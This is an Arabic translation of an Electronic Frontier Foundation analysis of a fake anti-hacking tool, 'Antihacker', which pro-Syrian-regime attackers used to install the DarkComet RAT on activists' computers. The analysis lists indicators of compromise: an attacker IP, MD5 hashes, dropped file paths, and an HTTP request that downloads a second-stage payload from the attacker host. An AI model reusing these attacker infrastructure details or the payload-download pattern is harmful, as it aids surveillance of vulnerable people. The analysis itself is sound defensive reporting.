هاكرز موالون للنظام السوري يستهدفون ناشطين بأدوات مزيفة لمكافحة القرصنة

مترجم من الإنجليزية (بتصرف) – من موقع مؤسسة الحدود الإلكترونية Electronic Frontier Foundation

مع تصاعد العنف في سوريا، تتصاعد أيضاً الهجمات الإلكترونية التي تستهدف الناشطين والصحافيين، باستخدام برمجيات مراقبة يتم تنصيبها بشكل خفي على حواسيبهم.

آخر حملة اكتشفت تبين أنها تتم عن طريق أداة مزيفة لمكافحة القرصنة تدعى “انتي هاكر” Antihacker، وهي تعد المستخدمين بـ”مسح سريع وكشف تلقائي” للبرمجيات الخبيثة. تشير التحاليل التي أجرتها مؤسسة الحدود الإلكترونية أن الجهة التي تقف خلف هذه الحملة هي نفسها الجهة التي قامت بعدة هجمات باستخدام برمجيات خبيثة، تحت غطاء إما إرسال مستندات متعلقة بالثورة أو نشر أداة لتشفير التواصل عبر سكايب، ويعود تاريخ هذه الهجمات إلى تشرين الثاني/نوفمبر 2011 على الأقل.

وبينما يعلن برنامج “أنتي هاكر” تقديم الحماية ضد القرصنة، فإن ما يقوم به هو تنصيب أداة نفاذ عن بعد تسمى “دارك كوميت رات” DarkComet RAT تتيح تسجيل النشاط عبر الـ “ويبكام”، تعطيل الإعدادات الخاصة بالتنبيه في بعض برامج مكافحة الفيروسات، تسجيل الضربات على لوحة المفاتيح، سرقة كلمات السر، ونشاطات كثيرة أخرى. من بين الهجمات التي حللتها مؤسسة الحدود الإلكترونية، تبين أنّ أكثر من اثنتي عشر منها نتج عنها تنصيب نسخ مختلفة من دارك كوميت.

وتوجد أيضاً مجموعة على فيسبوك تخص هذه البرمجية، كما يظهر من اللقطة أدناه:

يظهر على صفحة الفيسبوك رابط لموقع على الإنترنت، كما يظهر في هذه اللقطة. وقد تم تعطيل هذا النطاق، إلا أن الموقع لا يزال موجوداً على عنوان الـ “آي بي”: 216.6.0.28

يقدم هذا الموقع خيار تحميل البرنامج Antihacker.exe (md5sum af8e0815a0f44a78a95a89643f7c9ce6) كما يظهر في الصورة:

على عكس أداة تشفير سكايب المزيفة، هذا البرنامج المزيف لا يحتوي على الكثير من الكتابة بخط Comic Sans، والذي يشي بعدم الإحترافية، إلا أنه يحتوي على الكثير من الأخطاء المثيرة للشكوك، منها نافذة منبثقة، تظهر في الصورة أدناه، تحمل عبارة مكتوبة بلغة إنجليزية ركيكة تحذر المستخدم من أنه متصل بشبكة إنترنت لا تخضع للحماية:

متى ما قام المستخدم بتنصيب البرنامج، تظهر نافذة منبثقة أخرى مكتوبة أيضاً بطريقة خاطئة تشكر المستخدم وتخبره أن جهازه أصبح آمناً:

عوضاً عن تقديم أي نوع من الحماية ضد القراصنة، يقوم أنتي هاكر بالإتصال بالعنوان 216.6.0.28 مرة أخرى، ويحاول تحميل google.exe (md5sum 499d9bb81a79359523c9e6ef05f1b0d0) تحت الخصائص التالية:

TCP 0.0.0.0:0 Send 216.6.0.28:80
GET /google.exe HTTP/1.1
Host: 216.6.0.28
Connection: Keep-Alive

عندما يتم تنفيذ google.exe يجري تنصيب “دارك كوميت” عبر إسقاط الملفات التالية:

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\system.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\StartMenu.dll

وعلاوة على ذلك، يقوم البرنامج بخلق ملف لتسجيل ضربات لوحة المفاتيح، إسمه:

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dclogs.sys

وذلك بمجرد أن يبدأ المستخدم بالضرب على لوحة المفاتيح. لا يظهر هذا الملف في اللقطة أدناه.

 يقوم البرنامج أيضاً بخلق تبويبة في قائمة الإطلاق في ويندوز:

C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\…lnk

لم يعد بالإمكان كشف هذه النسخة من “دارك كوميت” منذ أول آب/أغسطس الحالي باستخدام البرامج المضادة للفيروسات، إلا أن بالإمكان كشفها باستخدام أداة إزالة دارك كوميت، وقد أنتجها المطور نفسه الذي أنتج “دارك كوميت”. اللقطة أدناه تظهر الأداة وهي تزيل “دارك كوميت” من حاسوب مصاب:

على مستخدمي الإنترنت في سوريا أن ينتبهوا بشكل خاص عندما يقومون بتحميل تطبيقات من مواقع غير معروفة. موقع AntiHacker أظهر عدة إشارات إلى كونه غير شرعي، بما في ذلك كثرة الإستعمال الخاطئ للغة الإنجليزية، ولكن هذه الحملة الهجومية تظهر أنه بالرغم من ازدياد النشطاء السوريين خبرةً بالجهود التي تسعى إلى خداعهم وجعلهم يحملون برمجيات خبيثة، يزداد المهاجمون تطوراً في نفس الوقت.